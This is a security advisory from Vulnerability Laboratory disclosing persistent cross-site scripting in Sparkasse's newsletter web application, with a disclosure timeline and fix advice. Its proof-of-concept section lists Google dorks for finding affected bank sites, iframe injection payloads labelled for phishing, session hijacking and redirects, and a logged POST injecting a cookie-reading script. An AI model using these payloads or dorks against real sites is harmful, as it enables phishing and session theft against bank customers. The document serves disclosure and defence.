Sparkasse Cross Site Scripting

The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the Sparkasse online service web-application.

MD5 | 40ab69f0309c212c4b750c71a779f73e

Document Title:
Sparkasse - Multiple Persistent Cross Site Scripting Web Vulnerabilities

References (Source):

Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Vulnerability Class:
Cross Site Scripting - Persistent

Product & Service Introduction:
A savings bank is a credit institution with the task of offering
opportunities to broad sections of the population.
to offer financial investment, to carry out payment transactions and to
meet local credit needs.
to satisfy the needs of small and medium-sized enterprises as well.

(Copy of the Homepage: )

Abstract Advisory Information:
The vulnerability laboratory core research team discovered multiple
persistent cross site vulnerabilities in the Sparkasse online service

Vulnerability Disclosure Timeline:
2018-10-25: Researcher Notification & Coordination (Security Researcher)
2018-10-26: Vendor Notification (S-CERT Department)
2018-10-29: Vendor Response/Feedback (S-CERT Department)
2019-02-20: Vendor Fix/Patch (Service Developer Team)
2018-**-**: Security Acknowledgements (S-CERT Department)
2019-03-07: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Affected Product(s):
Product: Mailing Server - Online Service (Web-Application)
2018 Q4 - 2019 Q1

Exploitation Technique:

Severity Level:

Authentication Type:
No authentication (guest)

User Interaction:
Low User Interaction

Disclosure Type:
Responsible Disclosure Program

Technical Details & Description:
A persistent input validation web vulnerability has been discovered in
the official sparkasse online service newsletter web-application.
Local low privileged user accounts are able to inject own malicious
script codes on the application-side of the vulnerable service module.

The vulnerability is located in the `firstname`, `lastname` and
`companyname` values of the `newsletter` module. The vulnerable parameters
are f[1][v], f[2][v] & f[2][v]. Remote attackers are able to inject own
malicious script code via POST method request to the application-side
of the sparkasse dns domain mailing service. The attack vector of the
vulnerability is persistent on the application-side and the request
method to inject is POST. The attacker does not need to be directly
authenticated because its only an initial registration without direct
activiation request. The injection point are the vulnerable input fields
and the execution of the malform injected code takes place in the
`` or unique `*` domains by a
client-side GET method request.

The issue affects all pages listed with the newsletter module. Thus lead
to an integration to all the different
domains by the involved service provider. Now the vulnerability is all
over in the sparkasse domains and allows email spoofing, phishing,
cross site requests for redirect to malware or exploits and persistent
manipulation of sparkasse domain (dbms) contents. Due to a crawl we
identified a large list of affected web-applications from sparkasse by
usage of different google dork methods. A targeted user can not see
that the manipulated website is insecure because of the trusted native
source that deliveres the contexts over the sparkasse mailing api.

The security risk of the persistent web vulnerability is estimated as
medium with a cvss (common vulnerability scoring system v3) count of 5.2.
The exploitation of the persistent input validation web vulnerability
requires low user inter action and no privileged application user account.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing, persistent external redirects to
malicious sources
and persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Newsletter

Vulnerable Input(s):
[+] Vorname
[+] Nachname
[+] Firmenname

Vulnerable Parameter(s):
[+] f[1][v]
[+] f[2][v]
[+] f[3][v]

Affected Domain(s):
[+] other unique domains like news.sparkasse ...

Proof of Concept (PoC):
The vulnerability can be exploited by remote attackers with low
privileged application user account and medium required user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.

Google Dorks:
allinurl:sparkasse /de/home/service/newsletter.html
allinurl:sparkasse newsletter.html?n=true

Google Dork URL:

Payload: Phishing
test"><iframe src=></iframe>

Payload: Session Hijacking
test"><iframe src=
test"><iframe src=

Payload: Malware or Exploit
test"><iframe src=></iframe>

Payload: Redirect
test"><window.frames["myFrame"].location = "http://...">

PoC: Demo URLs (Examples)

--- PoC Session Logs (POST) [Inject] ---
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 324
Cookie: JSESSIONID=0000IkwJ8m_99MAwctzQGQvKqQ7:559eb1d1d;
Connection: keep-alive
f[0][i]=1&f[0][v][email protected]&f[1][i]=5&f[1][v]=a<iframe
src= onload=alert(document.cookie)>
&f[3][v]=<iframe src=
POST: HTTP/1.1 200 OK
X-UA-Compatible: IE=edge
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache
Content-Length: 59
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Language: de-DE

--- PoC Session Logs (GET) [Execute] ---
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
TCPID=118104211048178479492; s_fid=65EF7EF7E0BBFBFC-20A9728F3A9D422B;
s_cc=true; TC_OPTOUT=0@@@017@@@ALL;
Connection: keep-alive
Upgrade-Insecure-Requests: 1
GET: HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset="UTF-8"
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip

PoC: Source (Email & Web Pages)
<table style="margin:0px auto; width:600px;" class="c100" width="600"
cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff" align="center">
<tbody><tr><td colspan="3" height="25">&nbsp;</td></tr>
<td class="c5" width="25">&nbsp;</td>
<td class="c90" width="550" valign="top">
<table width="100%" cellspacing="0" cellpadding="0" border="0"
<th style="font-weight: normal;" class="col"
valign="top" align="left">
<table width="100%" cellspacing="0" cellpadding="0"
border="0" bgcolor="#ffffff">
<td style="font-family:Arial, Helvetica,
sans-serif; font-size:12px; line-height:18px; color:#333333;" align="left">
<strong>Sehr geehrte Frau
b"><iframe>%20>"<iframe src=evil.source>[EXECUTION
POINT!],</strong><br /><br />
waren Sie bereits im Urlaub oder
stehen Ihnen die schAPnsten Tage des Jahres noch bevor? In unserem ersten
Beitrag berichten
wir A1/4ber die aktuellen Urlaubstrends der Deutschen. Die praktische App
Kwitt kAPnnen Sie das ganze Jahr A1/4ber nutzen. Lesen Sie, wie einfach es
mit dieser Anwendung
innerhalb Ihrer App aSparkassea ist, Geld von Handy zu Handy zu
A1/4berweisen, und sei es, um die Rechnung vom letzten Besuch bei Ihrem
Lieblingsitaliener zu teilen.
AuAerdem informieren wir Sie unter anderem darA1/4ber, wie Sie am besten
vorgehen, wenn Sie im Urlaub Grund zu einer Reklamation haben. &nbsp;<br>

Affected Domain(s):
Sparkasse Domains:

Sparkasse Unique Domains:

Sparkasse Muster Systems & Partners:

Solution - Fix & Patch:
1. The vulnerability can be patched by a parse and encode of the
vulnerable `firstname`, `lastname` and `companyname` input fields
in all the affected newsletter by an automated or manual update. Ask
Sparkasse Kassel after the first incident they resolved the issue.

2. Restrict the affected input fields and disallow the usage of special
chars to prevent malicious script code injection attacks.

3. Escape or safe encode the name parameter content in the html
generated template on the affected sparkasse mailing or unique domain page.

4. Sanitize in the outgoing emails through the sparkasse server the
affected name parameters to finally resolve the vulnerability.

5. Integrate a secure process to gain knowledge of any vulnerability
that is tracked and reported to banks or in the patch cycle to ensure
that vulnerability issues cannot become major infrastructure issues

Note: The issue has been reported to the finance informatic in 2018 q4
and was forwarded to the s-cert team of the sparkasse without any response.

Security Risk:
The security risk of the persistent input validation web vulnerability
in the web-application module is estimated as medium.
The vulnerability can be used to produce malicious and malformed content
to phish or exploit user session data the easy way.
The targeted users can not see that the delivered contents are not from
the original sparkasse source.

Credits & Authors:
Vulnerability Laboratory [Core Research Team] - Benjamin Kunz Mejri

Disclaimer & Information:
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.


Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright A(c) 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]aC/


Related Posts